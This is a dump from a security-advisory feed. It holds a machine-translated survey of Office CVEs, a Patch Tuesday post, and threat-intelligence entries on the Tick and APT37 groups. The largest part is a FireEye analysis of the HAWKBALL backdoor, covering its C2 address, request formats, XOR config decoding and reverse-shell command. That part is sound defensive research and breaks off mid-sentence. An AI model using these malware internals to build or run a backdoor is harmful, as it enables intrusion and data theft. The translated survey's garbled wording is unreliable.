\nCVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability \nCVE-2013-3906 \nOffice EPS file parsing vulnerability \nCVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nBy means of the Moniker the loading vulnerability \nCVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerability \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then based on the vulnerability type of the above-mentioned non-Flash vulnerabilities classification. Flash vulnerabilities related to the summary you can refer to other researcher's articles \nVulnerability type \nNumber \nStack Overflow(Stack Overflow) \nCVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nStack bounds write(Out-of-bound Write) \nCVE-2014-1761/CVE-2016-7193 \nType confusion(Type Confusion) \nCVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nAfter the release of reuse(Use After Free) \nCVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow(Integer Overflow) \nCVE-2013-3906 \nLogic vulnerabilities(Logical vulnerability) \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext We according to the above second table Flash vulnerability, except to one by one look at these vulnerabilities. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThe vulnerability is the Cohen laboratory head of the wushi found. This is a stack overflow vulnerability. \nOn the vulnerability analysis of the article to see snow on a lot, the following are a few articles. \nCVE-2010-3333 vulnerability analysis(in depth analysis) \nMS10-087 from vulnerability to patch to the POC \nThe vulnerability of the war of Chapter 2, Section 4 of this vulnerability also have to compare the system description, the interested reader can read The Associated chapters. \nCVE-2014-1761 \nThe vulnerability is Google found a 0day in. This is a heap memory bounds write vulnerability. \nLi Hai fly was on the vulnerability done a very wonderful analysis. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nSee snow forum is also related to the vulnerability of the two high-quality analysis articles. \nCVE-2014-1761 analysis notes \nms14-017(cve-2014-1761)learn the notes inside there is mentioned how to configure the correct environment \nThe security agent is also related to the vulnerability of a high-quality analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08the third period\uff09 \nIn addition, South Korea's AhnLab also made a post about this vulnerability report. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nDebugging this vulnerability requires attention is the vulnerability of some of the samples to trigger the environment is relatively harsh, the article inside mentions how to construct a relevant experimental environment. \nCVE-2016-7193 \nThe vulnerability is the Austrian Military Cyber Emergency Readiness Team Austria military Cyber Emergency Readiness Team reported to Microsoft a 0day is. \nIt is also a heap memory bounds write vulnerability. \nBaidu Security Labs has worked on the vulnerability done a more complete analysis. \nAPT attack weapon-the Word vulnerability, CVE-2016-7193 principles of the secret \nI also worked on the vulnerability of the use of writing to share through an article analysis. \nCombined with a field sample to construct a cve-2016-7193 bomb calculator use \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle 0day summary table will be listed for 2015 0day one. \nThis is a type confusion vulnerability. \nAbout the vulnerability, the fly tower has written an article analysis article. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe is also about the vulnerability wrote a wonderful analysis. \nword type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has the vulnerability of a wonderful analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09 \nKnow Chong Yu the 404 lab also wrote an article on the vulnerability the wonderful analysis. \nCVE-2015-1641 Word using the sample analysis \nI've also written relates to the vulnerability of the principles of an article to share. \nThe Open XML tag parsing class vulnerability analysis ideas \nIn debugging this relates to the heap spray in the office sample, the need to pay special attention to the debugger intervention tends to affect the process heap layout, particularly some of the heap option settings. If when debugging the sample behavior can not be a normal trigger, often directly with the debugger launch the sample result, this time you can try double-click the sample after Hang, the debug controller. \n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "cvss3": {}, "published": "2019-06-13T00:00:00", "type": "myhack58", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "modified": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2018-01-27T09:59:37", "description": "**Microsoft** on Tuesday released 14 security updates, including fixes for the **Spectre** and **Meltdown** flaws detailed last week, as well as a zero-day vulnerability in **Microsoft Office** that is being exploited in the wild. Separately, **Adobe** pushed a security update to its **Flash Player** software.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2014/07/brokenwindows.png)Last week's story, [Scary Chip Flaws Raise Spectre of Meltdown](<https://krebsonsecurity.com/2018/01/scary-chip-flaws-raise-spectre-of-meltdown/>), sought to explain the gravity of these two security flaws present in most modern computers, smartphones, tablets and mobile devices. The bugs are thought to be mainly exploitable in chips made by **Intel** and **ARM**, but researchers said it was possible they also could be leveraged to steal data from computers with chips made by **AMD**.\n\nBy the time that story had published, Microsoft had already begun shipping an emergency update to address the flaws, but many readers complained that their PCs experienced the dreaded \"[blue screen of death](<https://krebsonsecurity.com/2010/03/secret-obsession-odd-windows-crash-alerts/>)\" (BSOD) after applying the update. Microsoft warned that the BSOD problems were attributable to many antivirus programs not yet updating their software to play nice with the security updates.\n\nOn Tuesday, Microsoft said it was suspending the patches for computers running AMD chipsets.\n\n\"After investigating, Microsoft determined that some AMD chipsets do not conform to the documentation previously provided to Microsoft to develop the Windows operating system mitigations to protect against the chipset vulnerabilities known as Spectre and Meltdown,\" the company said in [a notice posted to its support site](<https://support.microsoft.com/en-us/help/4073707/windows-os-security-update-block-for-some-amd-based-devices?ranMID=24542&ranEAID=nOD%2FrLJHOac&ranSiteID=nOD_rLJHOac-_HQEBR_XRHQKxjSSaNyFXQ&tduid=\$c438b93529abd1646060d8789010252e\$\$256380\$\$2459594\$\$nOD_rLJHOac-_HQEBR_XRHQKxjSSaNyFXQ\$\$\$>).\n\n\"To prevent AMD customers from getting into an unbootable state, Microsoft has temporarily paused sending the following Windows operating system updates to devices that have impacted AMD processors,\" the company continued. \"Microsoft is working with AMD to resolve this issue and resume Windows OS security updates to the affected AMD devices via Windows Update and WSUS as soon as possible.\"\n\nIn short, if you're running Windows on a computer powered by an AMD, you're not going to be offered the Spectre/Meltdown fixes for now. Not sure whether your computer has an Intel or AMD chip? Most modern computers display this information (albeit very briefly) when the computer first starts up, before the Windows logo appears on the screen.\n\nHere's another way. From within Windows, users can find this information by pressing the Windows key on the keyboard and the \"Pause\" key at the same time, which should open the System Properties feature. The chip maker will be displayed next to the \"Processor:\" listing on that page.\n\nMicrosoft also on Tuesday [provided more information](<https://cloudblogs.microsoft.com/microsoftsecure/2018/01/09/understanding-the-performance-impact-of-spectre-and-meltdown-mitigations-on-windows-systems/>) about the potential performance impact on Windows computers after installing the Spectre/Meltdown updates. To summarize, Microsoft said **Windows 7**, **8.1** and **10** users on older chips (circa 2015 or older), as well as Windows server users on any silicon, are likely to notice a slowdown of their computer after applying this update.\n\nAny readers who experience a BSOD after applying January's batch of updates may be able to get help from Microsoft's site: Here are the corresponding help pages for [Windows 7](<https://support.microsoft.com/en-us/help/17074/windows-7-resolving-stop-blue-screen-errors>), [Windows 8.1](<https://support.microsoft.com/en-us/help/17075/windows-8-resolving-blue-screen-errors>) and [Windows 10](<https://support.microsoft.com/en-us/help/14238/windows-10-troubleshoot-blue-screen-errors>) users.\n\nAs evidenced by this debacle, it's a good idea to get in the habit of backing up your system on a regular basis. I typically do this at least once a month -- but especially right before installing any updates from Microsoft. \n\nAttackers could exploit a zero-day vulnerability in Office ([CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>)) just by getting a user to open a booby-trapped Office document or visit a malicious/hacked Web site. Microsoft also patched a flaw ([CVE-2018-0819](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0819>)) in **Office for Mac** that was publicly disclosed prior to the patch being released, potentially giving attackers a heads up on how to exploit the bug.\n\nOf the 56 vulnerabilities addressed in the January Patch Tuesday batch, at least 16 earned Microsoft's critical rating, meaning attackers could exploit them to gain full access to Windows systems with little help from users. For more on Tuesday's updates from Microsoft, check out blogs from [Ivanti](<https://www.ivanti.com/blog/january-patch-tuesday-2017/>) and [Qualys](<https://blog.qualys.com/laws-of-vulnerabilities/2018/01/09/january-patch-tuesday-meltdown-spectre-16-critical-microsoft-patches-1-adobe-patch>).\n\n![](https://krebsonsecurity.com/wp-content/uploads/2013/02/brokenflash-a.png)As per usual, Adobe issued an update for Flash Player yesterday. The update brings Flash to _version 28.0.0.137_ on Windows, **Mac**, and **Linux** systems. Windows users who browse the Web with anything other than **Internet Explorer** may need to apply the Flash patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.).\n\n**Chrome** and IE should auto-install the latest Flash version on browser restart (users may need to manually check for updates and/or restart the browser to get the latest Flash version). Chrome users may need to restart the browser to install or automatically download the latest version.\n\nWhen in doubt, click the vertical three dot icon to the right of the URL bar, select \u201cHelp,\u201d then \u201cAbout Chrome\u201d: If there is an update available, Chrome should install it then. Chrome will replace that three dot icon with an up-arrow inside of a circle when updates are waiting to be installed.\n\nStandard disclaimer: Because Flash remains such a security risk, I continue to encourage readers to remove or hobble Flash Player unless and until it is needed for a specific site or purpose. More on that approach (as well as slightly less radical solutions ) can be found in [A Month Without Adobe Flash Player](<http://krebsonsecurity.com/2015/06/a-month-without-adobe-flash-player/>). The short version is that you can probably get by without Flash installed and not miss it at all.\n\nFor readers still unwilling to cut the Flash cord, there are half-measures that work almost as well. Fortunately, [disabling Flash in Chrome](<https://support.google.com/chrome/answer/108086?hl=en>) is simple enough. Paste \u201c<chrome://settings/content>\u201d into a Chrome browser bar and then select \u201cFlash\u201d from the list of items. By default it should be set to \u201cAsk first\u201d before running Flash, although users also can disable Flash entirely here or whitelist and blacklist specific sites.\n\nAnother, perhaps less elegant, solution is to keep Flash installed in a browser that you don\u2019t normally use, and then to only use that browser on sites that require it.", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-10T16:07:35", "type": "krebs", "title": "Microsoft\u2019s Jan. 2018 Patch Tuesday Lowdown", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802", "CVE-2018-0819"], "modified": "2018-01-10T16:07:35", "href": "https://krebsonsecurity.com/2018/01/microsofts-jan-2018-patch-tuesday-lowdown/", "id": "KREBS:4F19DF7091060B198B092ABE2F7E1AA8", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "carbonblack": [{"lastseen": "2019-12-11T13:20:10", "description": "Trend Micro released a white paper about Tick, a Chinese cyberespionage threat actor targeting east asian countries. The report details several new downloader malware families. VMware Carbon Black Threat Analysis Unit (TAU) reviewed the malware and is providing product rules to detect and identify the malware.\n\n## Behavior Summary\n\nThe Trend Micro report stated that the downloaders were deployed by using right to left override (RTLO) technique or exploiting the CVE-2018-0802 and CVE-2018-0798 vulnerabilities. The downloaders have code which is used to detect antivirus products.\n\n![detect_av.png](https://community.carbonblack.com/t5/image/serverpage/image-id/3220i909392943F49A97C/image-dimensions/548x280?v=1.0)\n\nThe CB ThreatHunter process diagram shows the downloader activity after it is deployed by the dropper. As the dropper just sets the persistence, rebooting is required to run.![cbth_new.png](https://community.carbonblack.com/t5/image/serverpage/image-id/3221i036171C2924BA0A5/image-dimensions/599x283?v=1.0)__\n\nAdditionally, CB Defense will display the malware\u2019s overall triggered TTPs.\n\n![alert_origin.png](https://community.carbonblack.com/t5/image/serverpage/image-id/3222iBBA89170D56E87D8/image-size/large?v=1.0&px=999)__\n\nTo learn more, [click here.](<https://community.carbonblack.com/t5/Threat-Research-Docs/TAU-TIN-Tick-downloaders-Operation-ENDTRADE/ta-p/83641>)\n\nThe post [Threat Analysis Unit (TAU) Threat Intelligence Notification: Tick Downloaders (Operation ENDTRADE)](<https://www.carbonblack.com/2019/12/10/threat-analysis-unit-tau-threat-intelligence-notification-tick-downloaders-operation-endtrade/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-10T15:34:53", "type": "carbonblack", "title": "Threat Analysis Unit (TAU) Threat Intelligence Notification: Tick Downloaders (Operation ENDTRADE)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0798", "CVE-2018-0802"], "modified": "2019-12-10T15:34:53", "id": "CARBONBLACK:5FC3EC6D315A733A8D566BD7A42A12FE", "href": "https://www.carbonblack.com/2019/12/10/threat-analysis-unit-tau-threat-intelligence-notification-tick-downloaders-operation-endtrade/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2018-09-11T12:50:32", "description": "On Feb. 2, 2018, we published a [blog detailing the use of an Adobe Flash zero-day vulnerability](<https://www.fireeye.com/blog/threat-research/2018/02/attacks-leveraging-adobe-zero-day.html>) (CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper).\n\nOur analysis of APT37\u2019s recent activity reveals that the group\u2019s operations are expanding in scope and sophistication, with a toolset that includes access to zero-day vulnerabilities and wiper malware. We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests. FireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as [Scarcruft](<https://cdn.securelist.com/files/2017/10/Guerrero-Saade-Raiu-VB2017.pdf>) and [Group123](<http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html>).\n\nRead our report, _[APT37 (Reaper): The Overlooked North Korean Actor](<https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf>)_, to learn more about our assessment that this threat actor is working on behalf of the North Korean government, as well as various other details about their operations:\n\n * **Targeting:** Primarily South Korea \u2013 though also Japan, Vietnam and the Middle East \u2013 in various industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive, and healthcare.\n * **Initial Infection Tactics:** Social engineering tactics tailored specifically to desired targets, strategic web compromises typical of targeted cyber espionage operations, and the use of torrent file-sharing sites to distribute malware more indiscriminately.\n * **Exploited Vulnerabilities:** Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash. The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802), and the ability to incorporate them into operations.\n * **Command and Control Infrastructure:** Compromised servers, messaging platforms, and cloud service providers to avoid detection. The group has shown increasing sophistication by improving their operational security over time.\n * **Malware:** A diverse suite of malware for initial intrusion and exfiltration. Along with custom malware used for espionage purposes, APT37 also has access to destructive malware.\n\nMore information on this threat actor is found in our report, _[APT37 (Reaper): The Overlooked North Korean Actor](<https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf>)_. You can also [register for our upcoming webinar](<https://www2.fireeye.com/WBNR-APT37-Overlooked-North-Korean-Threat.html>) for additional insights into this group.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-20T08:30:00", "type": "fireeye", "title": "APT37 (Reaper): The Overlooked North Korean Actor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878", "CVE-2018-0802"], "modified": "2018-02-20T08:30:00", "id": "FIREEYE:96525D6EA5DBF734A371FB66EB02FA45", "href": "https://www.fireeye.com/blog/threat-research/2018/02/apt37-overlooked-north-korean-actor.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-11-23T02:06:52", "description": "FireEye Labs recently observed an attack against the government sector in Central Asia. The attack involved the new HAWKBALL backdoor being delivered via well-known Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802.\n\nHAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.\n\nFigure 1 shows the decoy used in the attack.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture1.png) \nFigure 1: Decoy used in attack\n\nThe decoy file, doc.rtf (MD5: AC0EAC22CE12EAC9EE15CA03646ED70C), contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP% with the name 8.t. This shellcode is decrypted in memory through EQENDT32.EXE. Figure 2 shows the decryption mechanism used in EQENDT32.EXE.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture2.png) \nFigure 2: Shellcode decryption routine\n\nThe decrypted shellcode is dropped as a Microsoft Word plugin WLL (MD5: D90E45FBF11B5BBDCA945B24D155A4B2) into C:\\Users\\ADMINI~1\\AppData\\Roaming\\Microsoft\\Word\\STARTUP (Figure 3).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture3.png) \nFigure 3: Payload dropped as Word plugin\n\n#### Technical Details\n\nDllMain of the dropped payload determines if the string WORD.EXE is present in the sample\u2019s command line. If the string is not present, the malware exits. If the string is present, the malware executes the command RunDll32.exe < C:\\Users\\ADMINI~1\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\hh14980443.wll, DllEntry> using the WinExec() function.\n\nDllEntry is the payload\u2019s only export function. The malware creates a log file in %TEMP% with the name c3E57B.tmp. The malware writes the current local time plus two hardcoded values every time in the following format:\n\n<Month int>/<Date int> <Hours>:<Minutes>:<Seconds>\\t<Hardcoded Digit>\\t<Hardcoded Digit>\\n\n\nExample:\n\n05/22 07:29:17 4 0\n\nThis log file is written to every 15 seconds. The last two digits are hard coded and passed as parameters to the function (Figure 4).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture4.png) \nFigure 4: String format for log file\n\nThe encrypted file contains a config file of 0x78 bytes. The data is decrypted with an 0xD9 XOR operation. The decrypted data contains command and control (C2) information as well as a mutex string used during malware initialization. Figure 5 shows the decryption routine and decrypted config file.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture5.png) \nFigure 5: Config decryption routine\n\nThe IP address from the config file is written to %TEMP%/3E57B.tmp with the current local time. For example:\n\n05/22 07:49:48 149.28.182.78.\n\n#### Mutex Creation\n\nThe malware creates a mutex to prevent multiple instances of execution. Before naming the mutex, the malware determines whether it is running as a system profile (Figure 6). To verify that the malware resolves the environment variable for %APPDATA%, it checks for the string **config/systemprofile.**\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture6.png) \nFigure 6: Verify whether malware is running as a system profile\n\nIf the malware is running as a system profile, the string **d0c** from the decrypted config file is used to create the mutex. Otherwise, the string **_cu** is appended to **d0c **and the mutex is named** d0c_cu **(Figure 7).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture7.png) \nFigure 7: Mutex creation\n\nAfter the mutex is created, the malware writes another entry in the logfile in %TEMP% with the values 32 and 0.\n\n#### Network Communication\n\nHAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP. The C2 server is obtained from the decrypted config file, as shown in Figure 5. The network request is formed with hard-coded values such as User-Agent. The malware also sets the other fields of request headers such as:\n\n * Content-Length: <content_length>\n * Cache-Control: no-cache\n * Connection: close\n\nThe malware sends an HTTP GET request to its C2 IP address using HTTP over port 443. Figure 8 shows the GET request sent over the network.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture8.png) \nFigure 8: Network request\n\nThe network request is formed with four parameters in the format shown in Figure 9.\n\n**Format = \"?t=%d&&s=%d&&p=%s&&k=%d\"**\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture9.png) \nFigure 9: GET request parameters formation\n\nTable 1 shows the GET request parameters.\n\n**Value**\n\n| \n\n**Information** \n \n---|--- \n \nT\n\n| \n\nInitially set to 0 \n \nS\n\n| \n\nInitially set to 0 \n \nP\n\n| \n\nString from decrypted config at 0x68 \n \nk\n\n| \n\nThe result of GetTickCount() \n \nTable 1: GET request parameters\n\nIf the returned response is 200, then the malware sends another GET request (Figure 10) with the following parameters (Figure 11).\n\n**Format = \"?e=%d&&t=%d&&k=%d\"**\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture10.png) \nFigure 10: Second GET request\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture11.png) \nFigure 11: Second GET request parameters formation\n\nTable 2 shows information about the parameters.\n\n**Value**\n\n| \n\n**Information** \n \n---|--- \n \nE\n\n| \n\nInitially Set to 0 \n \nT\n\n| \n\nInitially set to 0 \n \nK\n\n| \n\nThe result of GetTickCount() \n \nTable 2: Second GET request parameters\n\nIf the returned response is 200, the malware examines the Set-Cookie field. This field provides the Command ID. As shown in Figure 10, the field Set-Cookie responds with ID=17.\n\nThis Command ID acts as the index into a function table created by the malware. Figure 12 shows the creation of the virtual function table that will perform the backdoor\u2019s command.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture12.png) \nFigure 12: Function table\n\nTable 3 shows the commands supported by HAWKBALL.\n\n**Command**\n\n| \n\n**Operation Performed** \n \n---|--- \n \n0\n\n| \n\nSet URI query string to value \n \n16\n\n| \n\nUnknown \n \n17\n\n| \n\nCollect system information \n \n18\n\n| \n\nExecute a provided argument using CreateProcess \n \n19\n\n| \n\nExecute a provided argument using CreateProcess and upload output \n \n20\n\n| \n\nCreate a cmd.exe reverse shell, execute a command, and upload output \n \n21\n\n| \n\nShut down reverse shell \n \n22\n\n| \n\nUnknown \n \n23\n\n| \n\nShut down reverse shell \n \n48\n\n| \n\nDownload file \n \n64\n\n| \n\nGet drive geometry and free space for logical drives C-Z \n \n65\n\n| \n\nRetrieve information about provided directory \n \n66\n\n| \n\nDelete file \n \n67\n\n| \n\nMove file \n \nTable 3: HAWKBALL commands\n\n#### Collect System Information\n\nCommand ID 17 indexes to a function that collects the system information and sends it to the C2 server. The system information includes:\n\n * Computer Name\n * User Name\n * IP Address\n * Active Code Page\n * OEM Page\n * OS Version\n * Architecture Details (x32/x64)\n * String at 0x68 offset from decrypted config file\n\nThis information is retrieved from the victim using the following WINAPI calls:\n\n**Format = \"%s;%s;%s;%d;%d;%s;%s %dbit\"**\n\n * GetComputerNameA\n * GetUserNameA\n * Gethostbyname and inet_ntoa\n * GetACP\n * GetOEMPC\n * GetCurrentProcess and IsWow64Process\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture13.png) \nFigure 13: System information\n\nThe collected system information is concatenated together with a semicolon separating each field:\n\nWIN732BIT-L-0;Administrator;10.128.62.115;1252;437;d0c;Windows 7 32bit\n\nThis information is encrypted using an XOR operation. The response from the second GET request is used as the encryption key. As shown in Figure 10, the second GET request responds with a 4-byte XOR key. In this case the key is **0xE5044C18**.\n\nOnce encrypted, the system information is sent in the body of an HTTP POST. Figure 14 shows data sent over the network with the POST request.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture14.png) \nFigure 14: POST request\n\nIn the request header, the field **Cookie **is** **set with the command ID of the command for which the response is sent. As shown in Figure 14, the Cookie field is set with ID=17, which is the response for the previous command. In the received response, the next command is returned in field Set-Cookie.\n\nTable 4 shows the parameters of this POST request.\n\n**Parameter**\n\n| \n\n**Information** \n \n---|--- \n \nE\n\n| \n\nInitially set to 0 \n \nT\n\n| \n\nDecimal form of the little-endian XOR key \n \nK\n\n| \n\nThe result of GetTickCount() \n \nTable 4: POST request parameters\n\n##### Create Process\n\nThe malware creates a process with specified arguments. Figure 15 shows the operation.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture15.png) \nFigure 15: Command create process\n\n##### Delete File\n\nThe malware deletes the file specified as an argument. Figure 16 show the operation.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture16.png) \nFigure 16: Delete file operation\n\n##### Get Directory Information\n\nThe malware gets information for the provided directory address using the following WINAPI calls:\n\n * FindFirstFileW\n * FindNextFileW\n * FileTimeToLocalFileTime\n * FiletimeToSystemTime\n\nFigure 17 shows the API used for collecting information.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture17.png) \nFigure 17: Get directory information\n\n##### Get Disk Information\n\nThis command retrieves the drive information for drives C through Z along with available disk space for each drive.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture18.png) \nFigure 18: Retrieve drive information\n\nThe information is stored in the following format for each drive:\n\n**Format = \"%d+%d+%d+%d;\"**\n\nExample: \"8+512+6460870+16751103;\"\n\nThe information for all the available drives is combined and sent to the server using an operation similar to Figure 14.\n\n#### Anti-Debugging Tricks\n\n##### Debugger Detection With PEB\n\nThe malware queries the value for the flag BeingDebugged from PEB to check whether the process is being debugged.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture19.png) \nFigure 